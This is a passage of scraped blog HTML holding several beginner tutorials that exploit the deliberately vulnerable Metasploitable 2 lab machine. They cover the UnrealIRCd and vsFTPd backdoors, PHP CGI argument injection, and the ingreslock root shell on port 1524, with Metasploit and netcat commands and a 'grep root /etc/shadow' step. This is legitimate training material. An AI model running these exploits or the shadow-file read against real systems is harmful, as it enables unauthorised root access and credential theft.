<span style="font-family: Trebuchet MS, sans-serif;">Install <a href="https://hexchat.github.io/" target="_blank">HexChat</a> and connect to the IRC server to find out and verify the
version. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Fire up your Kali attacker and vulnerable Metasploitable 2
machines.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Searching <a href="https://www.offensive-security.com/metasploit-unleashed/msfconsole/" target="_blank">Metasploit Console</a></span></h3>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Startup Metasploit framework on Kali using the "msfconsole" command.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: search unreal<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">This command will tell the msfconsole to search it’s database for anything relating to “unreal”</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-uPq7M-88H9Q/V_3njDWJojI/AAAAAAAACqU/prqfm8r0B7sy1qOSrH6knS4ABa14NY-0gCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="191" src="https://4.bp.blogspot.com/-uPq7M-88H9Q/V_3njDWJojI/AAAAAAAACqU/prqfm8r0B7sy1qOSrH6knS4ABa14NY-0gCLcB/s400/1.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">3 exploit have been found. If you’ve completed the challenge
above you will know that the <a href="https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor" target="_blank">2<sup>nd</sup> exploit</a> is what we need as it matches
the version of IRC on the Metasploitable 2 machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">UnrealIRCD 3.2.8.1 Backdoor Exploit</span></h3>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: use exploit/unix/irc/unreal_ircd_3281_backdoor<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">After the exploit is set, we use “show options” command to
fill in any required setting that is unfilled. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-jOQ23iKWk7k/V_3njVDkmDI/AAAAAAAACqg/4ULpopeKGMwbJEtbixXjoW53A1JfqhNYgCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="191" src="https://3.bp.blogspot.com/-jOQ23iKWk7k/V_3njVDkmDI/AAAAAAAACqg/4ULpopeKGMwbJEtbixXjoW53A1JfqhNYgCEw/s400/2.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Looks like the “RHOST” is unfilled. RHOST stands for Remote
Host a.k.a Target machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: set RHOST <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-dUlCfSz6jXE/V_3njGxuMdI/AAAAAAAACqg/TWB1OJWZk8srBgg5XeSzwrKB7vxoIKDiQCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="32" src="https://1.bp.blogspot.com/-dUlCfSz6jXE/V_3njGxuMdI/AAAAAAAACqg/TWB1OJWZk8srBgg5XeSzwrKB7vxoIKDiQCEw/s400/3.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><span style="font-family: "verdana" , sans-serif;">We are all set now. </span><span style="font-family: "verdana" , sans-serif;">Enter the command: exploit</span></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Pnd1DccWiFw/V_3nj7NN-7I/AAAAAAAACqg/E8YfpnmpF1E5n4ZoieYxDuCXqq2oYYACACEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="207" src="https://3.bp.blogspot.com/-Pnd1DccWiFw/V_3nj7NN-7I/AAAAAAAACqg/E8YfpnmpF1E5n4ZoieYxDuCXqq2oYYACACEw/s400/4.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">And there we have our root access.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">You will notice a new command here - "grep root /etc/shadow". Google what is the shadow file. </span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">If you understood this well, congratulations. You are now a script kiddie. </span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">More seasoned security people most often tweak these exploits by manually selecting compatible preferred payloads, while the experts prefer to manually edit the whole exploit code to their liking.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Bitcrack's Advanced Hacking course is built specifically to teach you how fully customize your exploits to your likes, slice open malware's and more. Send us a tweet to find out more or reach out to us from <a href="http://www.bitcrack.net/contact" target="_blank">here</a>. </span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay)</a></i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-56273916251012215452016-09-30T04:02:00.001-07:002016-10-12T03:20:57.178-07:00Pwning Metasploitable 2: Accessing Backdoor on Port 1524 running Root Shell Service<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">From our previous articles we scanned all 65535 ports on
metasploitable 2. And we found that among many open ports, port 1524 was open. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Google search “port 1524 ingreslock” and you see that it is
a <a href="https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9202&signatureSubId=0" target="_blank">known backdoor</a>. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Scan the port and service version</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -sV -p 1524 <<target IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Lbysa80d-kM/V-5FKfuok5I/AAAAAAAACpY/jear7eFTG38IG9zPcJawXdpd6J7MXxi1wCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://3.bp.blogspot.com/-Lbysa80d-kM/V-5FKfuok5I/AAAAAAAACpY/jear7eFTG38IG9zPcJawXdpd6J7MXxi1wCLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Metasplotable root shell is running. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We just simply need to talk to that port via telnet, or netcat or ncat and should be able to gain root access because there is no authentication. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Telnet to port 1524</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: telnet <<target IP address>> 1524</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-_q-H1JA1rj0/V-5FKbrWqGI/AAAAAAAACpg/wwtr8eQSCOM5rNTdJvQS5Ui1YbaRJVU2gCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://2.bp.blogspot.com/-_q-H1JA1rj0/V-5FKbrWqGI/AAAAAAAACpg/wwtr8eQSCOM5rNTdJvQS5Ui1YbaRJVU2gCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="http://netcat.sourceforge.net/" target="_blank">Netcat</a> to port 1524</span></h3>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nc <<target IP address>> 1524</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-cQsj4NSfgos/V-5FKbh-DjI/AAAAAAAACpg/RTJX-HA9QcQnhiTAhZdDrTEG08ZAkfdeQCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="https://1.bp.blogspot.com/-cQsj4NSfgos/V-5FKbh-DjI/AAAAAAAACpg/RTJX-HA9QcQnhiTAhZdDrTEG08ZAkfdeQCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We have our root access to our target machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<br />
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">'Moral of the article': Scanning is key to pwning the target.
You can at times discover useful information that will help you get access to
that system without going through much trouble. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai(<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-84457200582933565112016-09-30T03:21:00.000-07:002016-10-12T03:19:37.801-07:00Pwning Metasloitable 2: Exploiting PHP v5.2.4 Vulnerability using PHP CGI Argument Injection<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">In our previous articles we have looked at exploiting the
<a href="https://security.appspot.com/vsftpd.html" target="_blank">vsFTPd service</a> both manually and automatically. Now let’s look at weaknesses on
the web server being hosted by our target machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Scan port 40 and 443 </span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -sV -p 80,443 <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We scan port 80 and 443 specifically because they are ports
for <a href="http://www.thewindowsclub.com/difference-http-https" target="_blank">HTTP and HTTPS</a>. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-6CVLHu1qRzs/V-47TOOiy0I/AAAAAAAACo8/NH4E7rNlKFUENy1NLxM5iJy7sFcQ6Bl6gCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://2.bp.blogspot.com/-6CVLHu1qRzs/V-47TOOiy0I/AAAAAAAACo8/NH4E7rNlKFUENy1NLxM5iJy7sFcQ6Bl6gCLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Results show that there is an active <a href="https://httpd.apache.org/" target="_blank">Apache server</a> running
on port 80 (HTTP). We can browse our target machine through the web browser. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Looking for information on the web server</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are lots of ways to gather info about and from web
servers. We will get to that in our later articles. For this article you need to know
one important thing – installed PHP usually have a “phpinfo.php” page for use
by the developers. However often it is forgotten to be deleted before going
live.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Open your web browser and go to: <<target IP
address>>/phpinfo.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5Hf-HKXF43Q/V-47Sk6U5lI/AAAAAAAACo0/VMgrxyqETAovZ5uxxxWYXAwTy3uB6jU0QCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://4.bp.blogspot.com/-5Hf-HKXF43Q/V-47Sk6U5lI/AAAAAAAACo0/VMgrxyqETAovZ5uxxxWYXAwTy3uB6jU0QCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">As you can see from that page, there is a lot of
information. Take a look at the PHP version. </span><span style="font-family: "trebuchet ms" , sans-serif;">After googling that version for any vulnerabilities, we can
find that it is vulnerable to a <a href="https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection" target="_blank">PHP CGI Argument Injection</a>.</span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;">Using the PHP CGI Argument Injection Exploit Module</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: msfconsole<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now let’s search for that exploit: Enter the command: Search
php_cgi<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-l2LtTVFVRxw/V-47TGbigyI/AAAAAAAACo4/RMetvjRrAYIO-gWHBnsQNftUoNuPjvX8gCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="https://4.bp.blogspot.com/-l2LtTVFVRxw/V-47TGbigyI/AAAAAAAACo4/RMetvjRrAYIO-gWHBnsQNftUoNuPjvX8gCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Use the exploit and show options:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-KbrLM6bv4gY/V-47ToavMMI/AAAAAAAACpA/MkyTIrhSSose_K-GcBwDCeSXyh-HMgSawCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://4.bp.blogspot.com/-KbrLM6bv4gY/V-47ToavMMI/AAAAAAAACpA/MkyTIrhSSose_K-GcBwDCeSXyh-HMgSawCEw/s400/4.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">RHOST is empty, set the RHOST by using command: set RHOST <<target IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You’re good to go. Exploit. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-NpLxDLsgZrU/V-47TjoEMCI/AAAAAAAACpE/QQnDcFP9zy8rSnMQcVhllq4EWdKMjHcjQCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://3.bp.blogspot.com/-NpLxDLsgZrU/V-47TjoEMCI/AAAAAAAACpE/QQnDcFP9zy8rSnMQcVhllq4EWdKMjHcjQCEw/s400/5.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;">You got a session. </span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;">What can you do with this? I leave that up to you to do some quick research on commands you can use on the <a href="https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/" target="_blank">meterpreter shell</a>. </span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></o:p></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-20940363636123704892016-09-29T03:25:00.000-07:002016-10-12T03:16:05.482-07:00Pwning Metasploitable 2: Exploiting the Vulnerable vsFTPd 2.3.4 service (Automatically)<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">On our previous article we learnt how to exploit the service
manually. You can find that article <a href="http://edublog.bitcrack.net/2016/09/pwning-metasploitable-2-exploiting.html" target="_blank">here</a>. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now let’s check out how exploit it without having to do it manually. We will exploit it using the <a href="https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor" target="_blank">vsFTPd 2.3.4 Backdoor Command Execution</a> exploit module. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://www.metasploit.com/" target="_blank">Metasploit</a> is a penetration testing application. It can run
scans with nmap, check for vulnerabilities on target host, and allows for easy
exploit execution. It holds a database of exploits which are ready to load and
execute on the target host. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Starting <a href="https://www.offensive-security.com/metasploit-unleashed/msfconsole/" target="_blank">Metasploit Console</a></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: msfconsole<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-ArVvfYy9ysY/V-zqtOm5FVI/AAAAAAAACoM/WoUp5pa-GN8EUokfn_-3g4iKnPZdNEW8ACLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://2.bp.blogspot.com/-ArVvfYy9ysY/V-zqtOm5FVI/AAAAAAAACoM/WoUp5pa-GN8EUokfn_-3g4iKnPZdNEW8ACLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The “msf> ” shows that you are now interacting with the metasploit
console.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Searching for vsFTPd exploits</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: search vsftpd<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command tells metasploit to search any exploits for
vsftpd<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/--i9GvK0olIw/V-zqs0y8DKI/AAAAAAAACoI/M02iW684rMAqHhT86L11LawOy1PTTdZiACEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://2.bp.blogspot.com/--i9GvK0olIw/V-zqs0y8DKI/AAAAAAAACoI/M02iW684rMAqHhT86L11LawOy1PTTdZiACEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The results show that we have an exploit for it in our
metasploit database. From the description we can learn that the exploit is
meant for the vsFTPd v2.3.4. And from the name we know that the exploit is
located in the “exploit/unix/ftp/” directory. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Using the exploit</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: use /exploit/unix/ftp/vstfpd_234_backdoor</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command gets the exploit ready for you.We now need to give it a target to execute on. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-On8DVA5okvI/V-zqs4AeCoI/AAAAAAAACoE/nw17rq0GGsQi6kdaGYOxYGPRjnSbTL0mgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://1.bp.blogspot.com/-On8DVA5okvI/V-zqs4AeCoI/AAAAAAAACoE/nw17rq0GGsQi6kdaGYOxYGPRjnSbTL0mgCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Setting target on the exploit</span></h3>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: show options<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command opens up all the options you can give to the exploit.
<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-t8pUc3pzuug/V-zqtWygFmI/AAAAAAAACoU/ic9nVv4_7PwwtGnW6tGRr_anlhRB-0k3gCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://2.bp.blogspot.com/-t8pUc3pzuug/V-zqtWygFmI/AAAAAAAACoU/ic9nVv4_7PwwtGnW6tGRr_anlhRB-0k3gCEw/s400/4.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We can see 2 options; RHOST and RPORT. Both of them are
required but the RHOST is empty. RHOST is short for Remote Host a.k.a target
address. We need to give it the target address.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: set RHOST <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-SeB1abrlRCA/V-zqtakZ83I/AAAAAAAACoQ/9Cc36jyLFY83IpmLBDJiMjE7slNWvZpVQCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="32" src="https://4.bp.blogspot.com/-SeB1abrlRCA/V-zqtakZ83I/AAAAAAAACoQ/9Cc36jyLFY83IpmLBDJiMjE7slNWvZpVQCEw/s400/5.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
